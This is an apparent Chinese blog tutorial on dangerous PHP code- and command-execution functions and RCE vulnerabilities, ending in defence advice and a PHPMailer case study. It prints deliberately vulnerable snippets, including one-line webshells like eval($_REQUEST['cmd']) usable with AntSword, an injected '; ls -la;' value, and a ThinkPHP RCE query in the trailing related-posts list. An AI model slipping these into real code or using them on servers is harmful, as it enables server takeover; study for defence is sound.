php危险函数及rce漏洞

最新推荐文章于 2023-11-05 23:02:59 发布
最新推荐文章于 2023-11-05 23:02:59 发布
阅读量474 收藏
点赞数
文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134044474
版权

php代码执行语句

eval()

eval()语句

eval() 会将符合PHP 语法规范字符串当作php 代码执行。

<meta charset="UTF-8">
<pre>
    <?php
        $dd=$_REQUEST['dd'];
        eval($dd);
    ?>

image-20231025162854116

image-20231025162904772

可以执行php代码

也可以套一层system执行系统操作指令

image-20231025163012820

assert()函数

assert() 会将字符串当做PHP 代码来执行。

说明

  • assert() 只能执行单条PHP 语句。
  • assert() 是一个函数,可以动态调用。
  • 高版本PHP 中,assert() 被弃用。
<pre>
    <?php
        $dd=$_REQUEST['dd'];
        assert($dd);
    ?>

image-20231025163619147

preg_replace函数

preg_replace() 函数的作用是对字符串进行正则匹配后替换。

$dd=preg_replace("/A/i","j","aJEST");
$dd=preg_replace("/\[.*\]/i","j","[phpinfo()]jboom");
$dd=preg_replace("/\[(.*)\]/i","\\1","[phpinfo()]");

image-20231025175024311

image-20231025175218324

回调函数

call_user_func

<?php
    $func = 'assert';
    $arg = "phpinfo();";

    call_user_func($func, $arg);
?>

image-20231025203432693

array_map

<?php
    $func=$_REQUEST["func"];
    $arr=$_REQUEST["arr"];

    array_map($func,$arr);
?>

image-20231025205231308

动态函数

由于PHP 的特性原因,PHP 的函数支持直接由拼接的方式调用,这直接导致了PHP 在安全上的控制有加大了难度。不少知名程序中也用到了动态函数的写法,这种写法跟使用call_user_func() 的初衷一样,用来更加方便地调用函数,但是一旦过滤不严格就会造成代码执行漏洞。

<?php
    $func=$_REQUEST["func"];
    $arr=$_REQUEST["arr"];

    $func($arr);
?>

image-20231025205056751

os命令执行函数

system函数

system() 能够将字符串作为操作系统(Operator Sytstemc,OS)命令执行。在类似systemc() 函数调用系统命令时,PHP 会自动区分平台。

<pre>
    <?php
        $dd=$_REQUEST['dd'];
        system($dd);
    ?>

image-20231025164312321

image-20231025164539169

exec函数

函数特点

  • 需要输出命令执行结果。
  • 只输出命令执行结果的最后一行,约等于没有回显。
<pre>
<?php
    $dd=$_REQUEST['dd'];
    echo exec($dd);
?>

image-20231025164740146

shell_exec函数

  • 需要输出命令执行结果
<pre>
<?php
    $dd=$_REQUEST['dd'];
    echo shell_exec($dd);
?>

image-20231025164947391

passthru函数

  • 自带输出功能
<pre>
<?php
    $dd=$_REQUEST['dd'];
    passthru($dd);
?>

image-20231025165106983

popen函数

说明

  • 函数返回值为文件指针,可以简单理解为文件名。
<pre>
<?php
    $dd=$_REQUEST['dd'];
    $result=popen($dd,'r');
    echo fread($result,1024);
?>

image-20231025165650275

只返回第一行内容

image-20231025170050481

反引号

反引号` 内的字符串,会被解析成OS 命令

<pre>
<?php
    $dd=$_REQUEST['dd'];
    
    echo `$dd`;
?>

image-20231025170452417

RCE漏洞

漏洞描述

​ 所谓RCE漏洞,即Remote Code/Command Execution,远程代码执行和远程命令执行漏洞。
在很多Web应用中,开发人员会使用一些函数,这些函数以一些字符串作为输入,功能是将输入的字符串当作代码或者命令来进行执行。当用户可以控制这些函数的输入时,就产生了RCE漏洞。
​ RCE漏洞是非常严重的安全漏洞,一旦出现,就意味着攻击者可以获取服务器的命令执行权限,从而对服务器安全造成极大的影响。

漏洞场景

  1. 执行系统命令:攻击者可以利用RCE漏洞执行系统命令,比如创建、修改或删除文件、目录,执行系统脚本等。这使得攻击者能够在目标服务器上执行任意操作。

  2. 控制服务器:攻击者可以利用RCE漏洞获取对服务器的控制权,包括远程登录、修改系统配置、安装后门等。这使得攻击者可以完全控制服务器,进行各种恶意活动。

  3. 数据窃取:攻击者可以利用RCE漏洞窃取服务器上的敏感信息,比如数据库凭据、用户密码、个人数据等。这些信息可以用于进一步的攻击或者非法获利。

  4. 进一步攻击:攻击者可以利用RCE漏洞在目标服务器上执行其他攻击,比如横向移动攻击,通过在受感染的服务器上执行代码,进一步攻击其他服务器或网络中的系统。

  5. 拒绝服务(Denial of Service,DoS)攻击:攻击者可以利用RCE漏洞执行恶意代码来消耗目标服务器的资源,导致服务器崩溃或无法正常工作,从而使服务不可用。

    ​ RCE漏洞的使用场景非常广泛,攻击者可以利用这种漏洞来执行任意操作,控制服务器,窃取敏感信息或者进一步攻击其他系统。

漏洞原理

  1. 用户输入:攻击者通常会找到目标系统上的一个输入点,比如Web应用程序的表单、URL参数、HTTP请求头等。这些输入点允许用户向系统提交数据。
  2. 输入处理:目标系统接收到用户输入后,会对其进行处理。这个处理过程可能包括解析、验证、过滤、拼接等操作。
  3. 注入恶意代码:攻击者利用输入处理过程中的漏洞,注入恶意代码。常见的注入点包括未正确过滤的特殊字符、未正确处理用户输入的引号或其他特殊字符等。
  4. 执行恶意代码:一旦恶意代码成功注入,目标系统在执行时会将其视为合法代码。这使得攻击者能够在目标系统上执行任意操作,比如执行系统命令、访问文件系统、修改配置文件等。
  5. 控制目标系统:通过执行恶意代码,攻击者可以获得对目标系统的控制权。这使得攻击者可以进行进一步的攻击,比如安装后门、窃取敏感信息、横向移动等。

RCE漏洞的原理主要是利用目标系统对用户输入的处理不当,导致攻击者能够注入恶意代码并执行。

漏洞危害

  1. 执行系统命令:RCE漏洞使得攻击者能够在目标系统上执行系统命令,比如创建、修改或删除文件、目录,执行系统脚本等。这使得攻击者可以在目标服务器上执行任意操作,包括控制服务器、窃取敏感信息等。
  2. 控制服务器:RCE漏洞使得攻击者可以获取对服务器的控制权,包括远程登录、修改系统配置、安装后门等。这使得攻击者可以完全控制服务器,进行各种恶意活动,比如植入恶意软件、发起其他攻击等。
  3. 数据窃取:攻击者可以利用RCE漏洞窃取服务器上的敏感信息,比如数据库凭据、用户密码、个人数据等。这些信息可以用于进一步的攻击或者非法获利,比如进行身份盗窃、敲诈勒索等。
  4. 进一步攻击:利用RCE漏洞,攻击者可以在目标服务器上执行其他攻击,比如横向移动攻击。攻击者可以通过在受感染的服务器上执行代码,进一步攻击其他服务器或网络中的系统,从而扩大攻击范围。
  5. 拒绝服务(Denial of Service,DoS)攻击:攻击者可以利用RCE漏洞执行恶意代码来消耗目标服务器的资源,导致服务器崩溃或无法正常工作,从而使服务不可用。这可能导致业务中断、数据丢失等严重后果。

漏洞评级

高危

漏洞验证

网页包含代码假如包含以下代码

<?php
   eval($_REQUEST['cmd']);
?>

即可通过url执行命令

image-20231025211304602

同时该代码存在,也可被蚁剑连接使用

image-20231025211414224

image-20231025211438708

如下代码也行

<?php
   $_GET['a']($_REQUEST['b']);
?>

image-20231025212727953

image-20231025212736272

漏洞利用

  • 可以蚁剑连接执行代码
  • 也可以通过传参执行代码

漏洞防御

  1. 输入验证和过滤:对于用户输入的数据,必须进行严格的验证和过滤,以防止恶意代码的注入。可以使用白名单过滤或正则表达式验证来限制输入的内容,只接受预期的数据。
  2. 输入转义:对于用户输入的数据,必须进行适当的转义,以确保任何特殊字符都被正确处理。这可以通过使用安全的编码函数或框架提供的转义函数来实现。
  3. 最小权限原则:在配置服务器和应用程序时,应使用最小权限原则。即,将服务器和应用程序配置为以最低权限运行,以限制攻击者可能获得的权限。
  4. 安全的代码执行环境:在执行用户输入的代码之前,应确保在一个安全的环境中执行。这可以通过使用沙箱技术、限制执行环境的资源访问权限、禁用危险的系统函数等方式来实现。
  5. 安全的开发实践:在开发过程中,应该遵循安全的开发实践,包括对代码进行安全审查和测试,使用安全的编程语言特性和函数,及时修复已知的漏洞等。
  6. 更新和修补漏洞:及时更新和修补应用程序、操作系统和相关软件的漏洞是至关重要的。漏洞的修复补丁通常会包括对RCE漏洞的修复。

漏洞案例

一个经典的RCE漏洞案例是PHPMailer漏洞(CVE-2016-10033和CVE-2016-10045)。

PHPMailer是一个流行的PHP库,用于发送电子邮件。在2016年之前的版本中,PHPMailer存在一个RCE漏洞,允许攻击者通过构造恶意的电子邮件来执行任意的系统命令。

漏洞的原因是在PHPMailer中,当使用邮件服务器的sendmail功能发送邮件时,可以通过用户提供的邮件主题字段来构造系统命令。然而,这个主题字段没有被适当地验证和过滤,导致攻击者可以注入恶意的命令。

攻击者可以构造一个恶意的邮件主题,其中包含一个系统命令,比如"; ls -la;。当PHPMailer尝试发送这个恶意邮件时,它会将恶意命令传递给系统命令执行函数,导致服务器执行了ls -la命令并返回结果。

这个漏洞的危害非常严重,攻击者可以通过构造恶意的命令来访问文件系统、执行其他系统命令、修改配置文件等。该漏洞在被发现后得到了修复,并提醒开发人员在使用PHPMailer时升级到修复版本以避免RCE漏洞的利用。
r中,当使用邮件服务器的sendmail功能发送邮件时,可以通过用户提供的邮件主题字段来构造系统命令。然而,这个主题字段没有被适当地验证和过滤,导致攻击者可以注入恶意的命令。

攻击者可以构造一个恶意的邮件主题,其中包含一个系统命令,比如"; ls -la;。当PHPMailer尝试发送这个恶意邮件时,它会将恶意命令传递给系统命令执行函数,导致服务器执行了ls -la命令并返回结果。

这个漏洞的危害非常严重,攻击者可以通过构造恶意的命令来访问文件系统、执行其他系统命令、修改配置文件等。该漏洞在被发现后得到了修复,并提醒开发人员在使用PHPMailer时升级到修复版本以避免RCE漏洞的利用。

order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPRCE
m0_63045593的博客
04-22 895
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
rConfig v3.9.2 RCE漏洞分析1
08-03
攻击者可以发送精心构造的 GET 请求触发该漏洞,请求包含两个参数,其 searchTerm 参数可以包含任意值,但该参数必须存在,才能执行到第 63 行的
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码的assign法第个变量为可控变量: 3.赋值结束后进display法,display法开始解析并获取模板件内容,此
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2173
记录自己的所学以及理解。
rce总结,绕过手法+危险函数举例
最新发布
2202_75361164的博客
11-05 779
rce总结,绕过手法+危险函数举例
php入门rce
五分之一世纪
08-06 1296
文章目录(1)什么是rce(2)php的命令执行(3)php代码执行的情况(4)一般的过滤方法(5)一般绕过方法 (1)什么是rce RCE(remote command/code execute)。分为远程命令执行ping以及远程代码执行evel。漏洞出现的原因是没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 (2)php的命
ThinkPHP语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 1965
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
【代码审计】51 PHP项目类 RCE 文件包含和下载
(∪.∪ )...zzz的博客
07-14 572
@TOC xhcms-无框架-文件包含跨站-搜索或应用-include 找核心代码分析 输出函数 功能点 通过搜索关键字echo 载入代码,找到后台,一般是admin 测试XSS漏洞 测试文件包含漏洞 关键字: include include_once require require_once 根据程序实现的功能猜测可能漏洞: 社交 交互:注入、跨站 下载、上传,和文件相关的 复制下载链接 ...
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查
无参数读文件和RCE总结
kuzemax的博客
07-18 712
什么是无参数?顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;
php rce和绕过
m0_73973498的博客
10-08 1180
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
RCE代码及命令执行漏洞简解
weixin_46739058的博客
04-09 2266
在 Web 应用有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞。同样调用系统命令处理,将造成命令执行漏洞RCE:远程命令/代码执行(remote command/code execute) 在 Web 应用有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符
Web漏洞-RCE代码及命令执行漏洞全解-web漏洞产生的原理及条件-墨者靶场详解
ran的博客
04-03 1496
指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。在Web应用有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。墨者靶场详解。
14-PHP代码审计——ThinkPHP5.0.23 RCE漏洞分析
网络安全
05-07 2252
环境: ThinkPHP5.0.15 漏洞影响版本:ThinkPHP5.0.23以下 poc: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami RCE漏洞 RCE漏洞全称为远程命令/代码执行漏洞(英文为remote command/code execute),可以让攻击者远程向目标服务器注入操作系统命令或代码执..
PHPrce函数,Thinkphp5-1-2-RCE简单分析
weixin_30332165的博客
04-12 392
前言上次出的洞是接近元旦吧,好像刚从南京回学校,要准备烦人的期末,没心思分析,前天我刚考完,今天刚爆的洞洞貌似。然后自己跟着调试了一下。漏洞细节这是复现图前提是要在index.php禁止报错,其实在生产环境开发也会这么做。漏洞点在\thinkphp\library\think\Request.php的method函数:public function method($origin = fal...
php无参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1825
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
RCE漏洞函数总结
weixin_51692662的博客
08-17 683
phprce,命令执行,代码执行
php RCE常用函数
08-26
PHP常用的RCE(远程代码执行)函数包括preg_match、array_values、current和eval。其,preg_match函数主要用于过滤函数,将一些常用不带参数的函数的关键部分过滤掉,需要使用其他方法来执行命令。 array_values...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值